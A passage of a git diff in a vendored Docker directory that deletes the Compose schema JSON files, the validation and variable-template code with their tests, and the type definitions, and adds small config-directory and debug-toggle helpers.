"type": ["string", "number"], - "format": "expose" - }, - "uniqueItems": true - }, - - "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, - "healthcheck": {"$ref": "#/definitions/healthcheck"}, - "hostname": {"type": "string"}, - "image": {"type": "string"}, - "ipc": {"type": "string"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - - "logging": { - "type": "object", - - "properties": { - "driver": {"type": "string"}, - "options": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number", "null"]} - } - } - }, - "additionalProperties": false - }, - - "mac_address": {"type": "string"}, - "network_mode": {"type": "string"}, - - "networks": { - "oneOf": [ - {"$ref": "#/definitions/list_of_strings"}, - { - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "oneOf": [ - { - "type": "object", - "properties": { - "aliases": {"$ref": "#/definitions/list_of_strings"}, - "ipv4_address": {"type": "string"}, - "ipv6_address": {"type": "string"} - }, - "additionalProperties": false - }, - {"type": "null"} - ] - } - }, - "additionalProperties": false - } - ] - }, - "pid": {"type": ["string", "null"]}, - - "ports": { - "type": "array", - "items": { - "type": ["string", "number"], - "format": "ports" - }, - "uniqueItems": true - }, - - "privileged": {"type": "boolean"}, - "read_only": {"type": "boolean"}, - "restart": {"type": "string"}, - "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "shm_size": {"type": ["number", "string"]}, - "sysctls": {"$ref": "#/definitions/list_or_dict"}, - "stdin_open": {"type": "boolean"}, - "stop_grace_period": {"type": "string", "format": "duration"}, - "stop_signal": {"type": "string"}, - "tmpfs": {"$ref": "#/definitions/string_or_list"}, - "tty": {"type": "boolean"}, - "ulimits": { - "type": "object", - "patternProperties": { - "^[a-z]+$": { - "oneOf": [ - {"type": "integer"}, - { - "type":"object", - "properties": { - "hard": {"type": "integer"}, - "soft": {"type": "integer"} - }, - "required": ["soft", "hard"], - "additionalProperties": false - } - ] - } - } - }, - "user": {"type": "string"}, - "userns_mode": {"type": "string"}, - "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "working_dir": {"type": "string"} - }, - "additionalProperties": false - }, - - "healthcheck": { - "id": "#/definitions/healthcheck", - "type": "object", - "additionalProperties": false, - "properties": { - "disable": {"type": "boolean"}, - "interval": {"type": "string"}, - "retries": {"type": "number"}, - "test": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "timeout": {"type": "string"} - } - }, - "deployment": { - "id": "#/definitions/deployment", - "type": ["object", "null"], - "properties": { - "mode": {"type": "string"}, - "replicas": {"type": "integer"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "update_config": { - "type": "object", - "properties": { - "parallelism": {"type": "integer"}, - "delay": {"type": "string", "format": "duration"}, - "failure_action": {"type": "string"}, - "monitor": {"type": "string", "format": "duration"}, - "max_failure_ratio": {"type": "number"} - }, - "additionalProperties": false - }, - "resources": { - "type": "object", - "properties": { - "limits": {"$ref": "#/definitions/resource"}, - "reservations": {"$ref": "#/definitions/resource"} - } - }, - "restart_policy": { - "type": "object", - "properties": { - "condition": {"type": "string"}, - "delay": {"type": "string", "format": "duration"}, - "max_attempts": {"type": "integer"}, - "window": {"type": "string", "format": "duration"} - }, - "additionalProperties": false - }, - "placement": { - "type": "object", - "properties": { - "constraints": {"type": "array", "items": {"type": "string"}} - }, - "additionalProperties": false - } - }, - "additionalProperties": false - }, - - "resource": { - "id": "#/definitions/resource", - "type": "object", - "properties": { - "cpus": {"type": "string"}, - "memory": {"type": "string"} - }, - "additionalProperties": false - }, - - "network": { - "id": "#/definitions/network", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "ipam": { - "type": "object", - "properties": { - "driver": {"type": "string"}, - "config": { - "type": "array", - "items": { - "type": "object", - "properties": { - "subnet": {"type": "string"} - }, - "additionalProperties": false - } - } - }, - "additionalProperties": false - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "internal": {"type": "boolean"}, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "volume": { - "id": "#/definitions/volume", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "string_or_list": { - "oneOf": [ - {"type": "string"}, - {"$ref": "#/definitions/list_of_strings"} - ] - }, - - "list_of_strings": { - "type": "array", - "items": {"type": "string"}, - "uniqueItems": true - }, - - "list_or_dict": { - "oneOf": [ - { - "type": "object", - "patternProperties": { - ".+": { - "type": ["string", "number", "null"] - } - }, - "additionalProperties": false - }, - {"type": "array", "items": {"type": "string"}, "uniqueItems": true} - ] - }, - - "constraints": { - "service": { - "id": "#/definitions/constraints/service", - "anyOf": [ - {"required": ["build"]}, - {"required": ["image"]} - ], - "properties": { - "build": { - "required": ["context"] - } - } - } - } - } -} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json deleted file mode 100644 index b7037485f9..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json +++ /dev/null @@ -1,428 +0,0 @@ -{ - "$schema": "http://json-schema.org/draft-04/schema#", - "id": "config_schema_v3.1.json", - "type": "object", - "required": ["version"], - - "properties": { - "version": { - "type": "string" - }, - - "services": { - "id": "#/properties/services", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/service" - } - }, - "additionalProperties": false - }, - - "networks": { - "id": "#/properties/networks", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/network" - } - } - }, - - "volumes": { - "id": "#/properties/volumes", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/volume" - } - }, - "additionalProperties": false - }, - - "secrets": { - "id": "#/properties/secrets", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/secret" - } - }, - "additionalProperties": false - } - }, - - "additionalProperties": false, - - "definitions": { - - "service": { - "id": "#/definitions/service", - "type": "object", - - "properties": { - "deploy": {"$ref": "#/definitions/deployment"}, - "build": { - "oneOf": [ - {"type": "string"}, - { - "type": "object", - "properties": { - "context": {"type": "string"}, - "dockerfile": {"type": "string"}, - "args": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - } - ] - }, - "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cgroup_parent": {"type": "string"}, - "command": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "container_name": {"type": "string"}, - "depends_on": {"$ref": "#/definitions/list_of_strings"}, - "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "dns": {"$ref": "#/definitions/string_or_list"}, - "dns_search": {"$ref": "#/definitions/string_or_list"}, - "domainname": {"type": "string"}, - "entrypoint": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "env_file": {"$ref": "#/definitions/string_or_list"}, - "environment": {"$ref": "#/definitions/list_or_dict"}, - - "expose": { - "type": "array", - "items": { - "type": ["string", "number"], - "format": "expose" - }, - "uniqueItems": true - }, - - "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, - "healthcheck": {"$ref": "#/definitions/healthcheck"}, - "hostname": {"type": "string"}, - "image": {"type": "string"}, - "ipc": {"type": "string"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - - "logging": { - "type": "object", - - "properties": { - "driver": {"type": "string"}, - "options": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number", "null"]} - } - } - }, - "additionalProperties": false - }, - - "mac_address": {"type": "string"}, - "network_mode": {"type": "string"}, - - "networks": { - "oneOf": [ - {"$ref": "#/definitions/list_of_strings"}, - { - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "oneOf": [ - { - "type": "object", - "properties": { - "aliases": {"$ref": "#/definitions/list_of_strings"}, - "ipv4_address": {"type": "string"}, - "ipv6_address": {"type": "string"} - }, - "additionalProperties": false - }, - {"type": "null"} - ] - } - }, - "additionalProperties": false - } - ] - }, - "pid": {"type": ["string", "null"]}, - - "ports": { - "type": "array", - "items": { - "type": ["string", "number"], - "format": "ports" - }, - "uniqueItems": true - }, - - "privileged": {"type": "boolean"}, - "read_only": {"type": "boolean"}, - "restart": {"type": "string"}, - "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "shm_size": {"type": ["number", "string"]}, - "secrets": { - "type": "array", - "items": { - "oneOf": [ - {"type": "string"}, - { - "type": "object", - "properties": { - "source": {"type": "string"}, - "target": {"type": "string"}, - "uid": {"type": "string"}, - "gid": {"type": "string"}, - "mode": {"type": "number"} - } - } - ] - } - }, - "sysctls": {"$ref": "#/definitions/list_or_dict"}, - "stdin_open": {"type": "boolean"}, - "stop_grace_period": {"type": "string", "format": "duration"}, - "stop_signal": {"type": "string"}, - "tmpfs": {"$ref": "#/definitions/string_or_list"}, - "tty": {"type": "boolean"}, - "ulimits": { - "type": "object", - "patternProperties": { - "^[a-z]+$": { - "oneOf": [ - {"type": "integer"}, - { - "type":"object", - "properties": { - "hard": {"type": "integer"}, - "soft": {"type": "integer"} - }, - "required": ["soft", "hard"], - "additionalProperties": false - } - ] - } - } - }, - "user": {"type": "string"}, - "userns_mode": {"type": "string"}, - "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "working_dir": {"type": "string"} - }, - "additionalProperties": false - }, - - "healthcheck": { - "id": "#/definitions/healthcheck", - "type": "object", - "additionalProperties": false, - "properties": { - "disable": {"type": "boolean"}, - "interval": {"type": "string"}, - "retries": {"type": "number"}, - "test": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "timeout": {"type": "string"} - } - }, - "deployment": { - "id": "#/definitions/deployment", - "type": ["object", "null"], - "properties": { - "mode": {"type": "string"}, - "replicas": {"type": "integer"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "update_config": { - "type": "object", - "properties": { - "parallelism": {"type": "integer"}, - "delay": {"type": "string", "format": "duration"}, - "failure_action": {"type": "string"}, - "monitor": {"type": "string", "format": "duration"}, - "max_failure_ratio": {"type": "number"} - }, - "additionalProperties": false - }, - "resources": { - "type": "object", - "properties": { - "limits": {"$ref": "#/definitions/resource"}, - "reservations": {"$ref": "#/definitions/resource"} - } - }, - "restart_policy": { - "type": "object", - "properties": { - "condition": {"type": "string"}, - "delay": {"type": "string", "format": "duration"}, - "max_attempts": {"type": "integer"}, - "window": {"type": "string", "format": "duration"} - }, - "additionalProperties": false - }, - "placement": { - "type": "object", - "properties": { - "constraints": {"type": "array", "items": {"type": "string"}} - }, - "additionalProperties": false - } - }, - "additionalProperties": false - }, - - "resource": { - "id": "#/definitions/resource", - "type": "object", - "properties": { - "cpus": {"type": "string"}, - "memory": {"type": "string"} - }, - "additionalProperties": false - }, - - "network": { - "id": "#/definitions/network", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "ipam": { - "type": "object", - "properties": { - "driver": {"type": "string"}, - "config": { - "type": "array", - "items": { - "type": "object", - "properties": { - "subnet": {"type": "string"} - }, - "additionalProperties": false - } - } - }, - "additionalProperties": false - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "internal": {"type": "boolean"}, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "volume": { - "id": "#/definitions/volume", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "secret": { - "id": "#/definitions/secret", - "type": "object", - "properties": { - "file": {"type": "string"}, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - } - }, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "string_or_list": { - "oneOf": [ - {"type": "string"}, - {"$ref": "#/definitions/list_of_strings"} - ] - }, - - "list_of_strings": { - "type": "array", - "items": {"type": "string"}, - "uniqueItems": true - }, - - "list_or_dict": { - "oneOf": [ - { - "type": "object", - "patternProperties": { - ".+": { - "type": ["string", "number", "null"] - } - }, - "additionalProperties": false - }, - {"type": "array", "items": {"type": "string"}, "uniqueItems": true} - ] - }, - - "constraints": { - "service": { - "id": "#/definitions/constraints/service", - "anyOf": [ - {"required": ["build"]}, - {"required": ["image"]} - ], - "properties": { - "build": { - "required": ["context"] - } - } - } - } - } -} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema.go b/vendor/github.com/docker/docker/cli/compose/schema/schema.go deleted file mode 100644 index ae33c77fbe..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/schema.go +++ /dev/null @@ -1,137 +0,0 @@ -package schema - -//go:generate go-bindata -pkg schema -nometadata data - -import ( - "fmt" - "strings" - "time" - - "github.com/pkg/errors" - "github.com/xeipuuv/gojsonschema" -) - -const ( - defaultVersion = "1.0" - versionField = "version" -) - -type portsFormatChecker struct{} - -func (checker portsFormatChecker) IsFormat(input string) bool { - // TODO: implement this - return true -} - -type durationFormatChecker struct{} - -func (checker durationFormatChecker) IsFormat(input string) bool { - _, err := time.ParseDuration(input) - return err == nil -} - -func init() { - gojsonschema.FormatCheckers.Add("expose", portsFormatChecker{}) - gojsonschema.FormatCheckers.Add("ports", portsFormatChecker{}) - gojsonschema.FormatCheckers.Add("duration", durationFormatChecker{}) -} - -// Version returns the version of the config, defaulting to version 1.0 -func Version(config map[string]interface{}) string { - version, ok := config[versionField] - if !ok { - return defaultVersion - } - return normalizeVersion(fmt.Sprintf("%v", version)) -} - -func normalizeVersion(version string) string { - switch version { - case "3": - return "3.0" - default: - return version - } -} - -// Validate uses the jsonschema to validate the configuration -func Validate(config map[string]interface{}, version string) error { - schemaData, err := Asset(fmt.Sprintf("data/config_schema_v%s.json", version)) - if err != nil { - return errors.Errorf("unsupported Compose file version: %s", version) - } - - schemaLoader := gojsonschema.NewStringLoader(string(schemaData)) - dataLoader := gojsonschema.NewGoLoader(config) - - result, err := gojsonschema.Validate(schemaLoader, dataLoader) - if err != nil { - return err - } - - if !result.Valid() { - return toError(result) - } - - return nil -} - -func toError(result *gojsonschema.Result) error { - err := getMostSpecificError(result.Errors()) - description := getDescription(err) - return fmt.Errorf("%s %s", err.Field(), description) -} - -func getDescription(err gojsonschema.ResultError) string { - if err.Type() == "invalid_type" { - if expectedType, ok := err.Details()["expected"].(string); ok { - return fmt.Sprintf("must be a %s", humanReadableType(expectedType)) - } - } - - return err.Description() -} - -func humanReadableType(definition string) string { - if definition[0:1] == "[" { - allTypes := strings.Split(definition[1:len(definition)-1], ",") - for i, t := range allTypes { - allTypes[i] = humanReadableType(t) - } - return fmt.Sprintf( - "%s or %s", - strings.Join(allTypes[0:len(allTypes)-1], ", "), - allTypes[len(allTypes)-1], - ) - } - if definition == "object" { - return "mapping" - } - if definition == "array" { - return "list" - } - return definition -} - -func getMostSpecificError(errors []gojsonschema.ResultError) gojsonschema.ResultError { - var mostSpecificError gojsonschema.ResultError - - for _, err := range errors { - if mostSpecificError == nil { - mostSpecificError = err - } else if specificity(err) > specificity(mostSpecificError) { - mostSpecificError = err - } else if specificity(err) == specificity(mostSpecificError) { - // Invalid type errors win in a tie-breaker for most specific field name - if err.Type() == "invalid_type" && mostSpecificError.Type() != "invalid_type" { - mostSpecificError = err - } - } - } - - return mostSpecificError -} - -func specificity(err gojsonschema.ResultError) int { - return len(strings.Split(err.Field(), ".")) -} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go deleted file mode 100644 index 0935d4022e..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go +++ /dev/null @@ -1,52 +0,0 @@ -package schema - -import ( - "testing" - - "github.com/stretchr/testify/assert" -) - -type dict map[string]interface{} - -func TestValidate(t *testing.T) { - config := dict{ - "version": "3.0", - "services": dict{ - "foo": dict{ - "image": "busybox", - }, - }, - } - - assert.NoError(t, Validate(config, "3.0")) -} - -func TestValidateUndefinedTopLevelOption(t *testing.T) { - config := dict{ - "version": "3.0", - "helicopters": dict{ - "foo": dict{ - "image": "busybox", - }, - }, - } - - err := Validate(config, "3.0") - assert.Error(t, err) - assert.Contains(t, err.Error(), "Additional property helicopters is not allowed") -} - -func TestValidateInvalidVersion(t *testing.T) { - config := dict{ - "version": "2.1", - "services": dict{ - "foo": dict{ - "image": "busybox", - }, - }, - } - - err := Validate(config, "2.1") - assert.Error(t, err) - assert.Contains(t, err.Error(), "unsupported Compose file version: 2.1") -} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template.go b/vendor/github.com/docker/docker/cli/compose/template/template.go deleted file mode 100644 index 28495baf50..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/template/template.go +++ /dev/null @@ -1,100 +0,0 @@ -package template - -import ( - "fmt" - "regexp" - "strings" -) - -var delimiter = "\\$" -var substitution = "[_a-z][_a-z0-9]*(?::?-[^}]+)?" - -var patternString = fmt.Sprintf( - "%s(?i:(?P%s)|(?P%s)|{(?P%s)}|(?P))", - delimiter, delimiter, substitution, substitution, -) - -var pattern = regexp.MustCompile(patternString) - -// InvalidTemplateError is returned when a variable template is not in a valid -// format -type InvalidTemplateError struct { - Template string -} - -func (e InvalidTemplateError) Error() string { - return fmt.Sprintf("Invalid template: %#v", e.Template) -} - -// Mapping is a user-supplied function which maps from variable names to values. -// Returns the value as a string and a bool indicating whether -// the value is present, to distinguish between an empty string -// and the absence of a value. -type Mapping func(string) (string, bool) - -// Substitute variables in the string with their values -func Substitute(template string, mapping Mapping) (result string, err *InvalidTemplateError) { - result = pattern.ReplaceAllStringFunc(template, func(substring string) string { - matches := pattern.FindStringSubmatch(substring) - groups := make(map[string]string) - for i, name := range pattern.SubexpNames() { - if i != 0 { - groups[name] = matches[i] - } - } - - substitution := groups["named"] - if substitution == "" { - substitution = groups["braced"] - } - if substitution != "" { - // Soft default (fall back if unset or empty) - if strings.Contains(substitution, ":-") { - name, defaultValue := partition(substitution, ":-") - value, ok := mapping(name) - if !ok || value == "" { - return defaultValue - } - return value - } - - // Hard default (fall back if-and-only-if empty) - if strings.Contains(substitution, "-") { - name, defaultValue := partition(substitution, "-") - value, ok := mapping(name) - if !ok { - return defaultValue - } - return value - } - - // No default (fall back to empty string) - value, ok := mapping(substitution) - if !ok { - return "" - } - return value - } - - if escaped := groups["escaped"]; escaped != "" { - return escaped - } - - err = &InvalidTemplateError{Template: template} - return "" - }) - - return result, err -} - -// Split the string at the first occurrence of sep, and return the part before the separator, -// and the part after the separator. -// -// If the separator is not found, return the string itself, followed by an empty string. -func partition(s, sep string) (string, string) { - if strings.Contains(s, sep) { - parts := strings.SplitN(s, sep, 2) - return parts[0], parts[1] - } - return s, "" -} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template_test.go b/vendor/github.com/docker/docker/cli/compose/template/template_test.go deleted file mode 100644 index 6b81bf0a39..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/template/template_test.go +++ /dev/null @@ -1,83 +0,0 @@ -package template - -import ( - "testing" - - "github.com/stretchr/testify/assert" -) - -var defaults = map[string]string{ - "FOO": "first", - "BAR": "", -} - -func defaultMapping(name string) (string, bool) { - val, ok := defaults[name] - return val, ok -} - -func TestEscaped(t *testing.T) { - result, err := Substitute("$${foo}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "${foo}", result) -} - -func TestInvalid(t *testing.T) { - invalidTemplates := []string{ - "${", - "$}", - "${}", - "${ }", - "${ foo}", - "${foo }", - "${foo!}", - } - - for _, template := range invalidTemplates { - _, err := Substitute(template, defaultMapping) - assert.Error(t, err) - assert.IsType(t, &InvalidTemplateError{}, err) - } -} - -func TestNoValueNoDefault(t *testing.T) { - for _, template := range []string{"This ${missing} var", "This ${BAR} var"} { - result, err := Substitute(template, defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "This var", result) - } -} - -func TestValueNoDefault(t *testing.T) { - for _, template := range []string{"This $FOO var", "This ${FOO} var"} { - result, err := Substitute(template, defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "This first var", result) - } -} - -func TestNoValueWithDefault(t *testing.T) { - for _, template := range []string{"ok ${missing:-def}", "ok ${missing-def}"} { - result, err := Substitute(template, defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok def", result) - } -} - -func TestEmptyValueWithSoftDefault(t *testing.T) { - result, err := Substitute("ok ${BAR:-def}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok def", result) -} - -func TestEmptyValueWithHardDefault(t *testing.T) { - result, err := Substitute("ok ${BAR-def}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok ", result) -} - -func TestNonAlphanumericDefault(t *testing.T) { - result, err := Substitute("ok ${BAR:-/non:-alphanumeric}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok /non:-alphanumeric", result) -} diff --git a/vendor/github.com/docker/docker/cli/compose/types/types.go b/vendor/github.com/docker/docker/cli/compose/types/types.go deleted file mode 100644 index cae7b4af26..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/types/types.go +++ /dev/null @@ -1,253 +0,0 @@ -package types - -import ( - "time" -) - -// UnsupportedProperties not yet supported by this implementation of the compose file -var UnsupportedProperties = []string{ - "build", - "cap_add", - "cap_drop", - "cgroup_parent", - "devices", - "dns", - "dns_search", - "domainname", - "external_links", - "ipc", - "links", - "mac_address", - "network_mode", - "privileged", - "read_only", - "restart", - "security_opt", - "shm_size", - "stop_signal", - "sysctls", - "tmpfs", - "userns_mode", -} - -// DeprecatedProperties that were removed from the v3 format, but their -// use should not impact the behaviour of the application. -var DeprecatedProperties = map[string]string{ - "container_name": "Setting the container name is not supported.", - "expose": "Exposing ports is unnecessary - services on the same network can access each other's containers on any port.", -} - -// ForbiddenProperties that are not supported in this implementation of the -// compose file. -var ForbiddenProperties = map[string]string{ - "extends": "Support for `extends` is not implemented yet. Use `docker-compose config` to generate a configuration with all `extends` options resolved, and deploy from that.", - "volume_driver": "Instead of setting the volume driver on the service, define a volume using the top-level `volumes` option and specify the driver there.", - "volumes_from": "To share a volume between services, define it using the top-level `volumes` option and reference it from each service that shares it using the service-level `volumes` option.", - "cpu_quota": "Set resource limits using deploy.resources", - "cpu_shares": "Set resource limits using deploy.resources", - "cpuset": "Set resource limits using deploy.resources", - "mem_limit": "Set resource limits using deploy.resources", - "memswap_limit": "Set resource limits using deploy.resources", -} - -// Dict is a mapping of strings to interface{} -type Dict map[string]interface{} - -// ConfigFile is a filename and the contents of the file as a Dict -type ConfigFile struct { - Filename string - Config Dict -} - -// ConfigDetails are the details about a group of ConfigFiles -type ConfigDetails struct { - WorkingDir string - ConfigFiles []ConfigFile - Environment map[string]string -} - -// Config is a full compose file configuration -type Config struct { - Services []ServiceConfig - Networks map[string]NetworkConfig - Volumes map[string]VolumeConfig - Secrets map[string]SecretConfig -} - -// ServiceConfig is the configuration of one service -type ServiceConfig struct { - Name string - - CapAdd []string `mapstructure:"cap_add"` - CapDrop []string `mapstructure:"cap_drop"` - CgroupParent string `mapstructure:"cgroup_parent"` - Command []string `compose:"shell_command"` - ContainerName string `mapstructure:"container_name"` - DependsOn []string `mapstructure:"depends_on"` - Deploy DeployConfig - Devices []string - DNS []string `compose:"string_or_list"` - DNSSearch []string `mapstructure:"dns_search" compose:"string_or_list"` - DomainName string `mapstructure:"domainname"` - Entrypoint []string `compose:"shell_command"` - Environment map[string]string `compose:"list_or_dict_equals"` - Expose []string `compose:"list_of_strings_or_numbers"` - ExternalLinks []string `mapstructure:"external_links"` - ExtraHosts map[string]string `mapstructure:"extra_hosts" compose:"list_or_dict_colon"` - Hostname string - HealthCheck *HealthCheckConfig - Image string - Ipc string - Labels map[string]string `compose:"list_or_dict_equals"` - Links []string - Logging *LoggingConfig - MacAddress string `mapstructure:"mac_address"` - NetworkMode string `mapstructure:"network_mode"` - Networks map[string]*ServiceNetworkConfig `compose:"list_or_struct_map"` - Pid string - Ports []string `compose:"list_of_strings_or_numbers"` - Privileged bool - ReadOnly bool `mapstructure:"read_only"` - Restart string - Secrets []ServiceSecretConfig - SecurityOpt []string `mapstructure:"security_opt"` - StdinOpen bool `mapstructure:"stdin_open"` - StopGracePeriod *time.Duration `mapstructure:"stop_grace_period"` - StopSignal string `mapstructure:"stop_signal"` - Tmpfs []string `compose:"string_or_list"` - Tty bool `mapstructure:"tty"` - Ulimits map[string]*UlimitsConfig - User string - Volumes []string - WorkingDir string `mapstructure:"working_dir"` -} - -// LoggingConfig the logging configuration for a service -type LoggingConfig struct { - Driver string - Options map[string]string -} - -// DeployConfig the deployment configuration for a service -type DeployConfig struct { - Mode string - Replicas *uint64 - Labels map[string]string `compose:"list_or_dict_equals"` - UpdateConfig *UpdateConfig `mapstructure:"update_config"` - Resources Resources - RestartPolicy *RestartPolicy `mapstructure:"restart_policy"` - Placement Placement -} - -// HealthCheckConfig the healthcheck configuration for a service -type HealthCheckConfig struct { - Test []string `compose:"healthcheck"` - Timeout string - Interval string - Retries *uint64 - Disable bool -} - -// UpdateConfig the service update configuration -type UpdateConfig struct { - Parallelism *uint64 - Delay time.Duration - FailureAction string `mapstructure:"failure_action"` - Monitor time.Duration - MaxFailureRatio float32 `mapstructure:"max_failure_ratio"` -} - -// Resources the resource limits and reservations -type Resources struct { - Limits *Resource - Reservations *Resource -} - -// Resource is a resource to be limited or reserved -type Resource struct { - // TODO: types to convert from units and ratios - NanoCPUs string `mapstructure:"cpus"` - MemoryBytes UnitBytes `mapstructure:"memory"` -} - -// UnitBytes is the bytes type -type UnitBytes int64 - -// RestartPolicy the service restart policy -type RestartPolicy struct { - Condition string - Delay *time.Duration - MaxAttempts *uint64 `mapstructure:"max_attempts"` - Window *time.Duration -} - -// Placement constraints for the service -type Placement struct { - Constraints []string -} - -// ServiceNetworkConfig is the network configuration for a service -type ServiceNetworkConfig struct { - Aliases []string - Ipv4Address string `mapstructure:"ipv4_address"` - Ipv6Address string `mapstructure:"ipv6_address"` -} - -// ServiceSecretConfig is the secret configuration for a service -type ServiceSecretConfig struct { - Source string - Target string - UID string - GID string - Mode uint32 -} - -// UlimitsConfig the ulimit configuration -type UlimitsConfig struct { - Single int - Soft int - Hard int -} - -// NetworkConfig for a network -type NetworkConfig struct { - Driver string - DriverOpts map[string]string `mapstructure:"driver_opts"` - Ipam IPAMConfig - External External - Internal bool - Labels map[string]string `compose:"list_or_dict_equals"` -} - -// IPAMConfig for a network -type IPAMConfig struct { - Driver string - Config []*IPAMPool -} - -// IPAMPool for a network -type IPAMPool struct { - Subnet string -} - -// VolumeConfig for a volume -type VolumeConfig struct { - Driver string - DriverOpts map[string]string `mapstructure:"driver_opts"` - External External - Labels map[string]string `compose:"list_or_dict_equals"` -} - -// External identifies a Volume or Network as a reference to a resource that is -// not managed, and should already exist. -type External struct { - Name string - External bool -} - -// SecretConfig for a secret -type SecretConfig struct { - File string - External External - Labels map[string]string `compose:"list_or_dict_equals"` -} diff --git a/vendor/github.com/docker/docker/cli/config/configdir.go b/vendor/github.com/docker/docker/cli/config/configdir.go new file mode 100644 index 0000000000..4bef4e104d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/config/configdir.go @@ -0,0 +1,25 @@ +package config // import "github.com/docker/docker/cli/config" + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/pkg/homedir" +) + +var ( + configDir = os.Getenv("DOCKER_CONFIG") + configFileDir = ".docker" +) + +// Dir returns the path to the configuration directory as specified by the DOCKER_CONFIG environment variable. +// TODO: this was copied from cli/config/configfile and should be removed once cmd/dockerd moves +func Dir() string { + return configDir +} + +func init() { + if configDir == "" { + configDir = filepath.Join(homedir.Get(), configFileDir) + } +} diff --git a/vendor/github.com/docker/docker/cli/debug/debug.go b/vendor/github.com/docker/docker/cli/debug/debug.go new file mode 100644 index 0000000000..2303e15c99 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/debug/debug.go @@ -0,0 +1,26 @@ +package debug // import "github.com/docker/docker/cli/debug" + +import ( + "os" + + "github.com/sirupsen/logrus" +) + +// Enable sets the DEBUG env var to true +// and makes the logger to log at debug level. +func Enable() { + os.Setenv("DEBUG", "1") + logrus.SetLevel(logrus.DebugLevel) +} + +// Disable sets the DEBUG env var to false +// and makes the logger to log at info level. +func Disable() { + os.Setenv("DEBUG", "") + logrus.SetLevel(logrus.InfoLevel) +} + +// IsEnabled checks whether the debug flag is set or not. +func IsEnabled() bool { + return os.Getenv("DEBUG") != "" +} diff --git 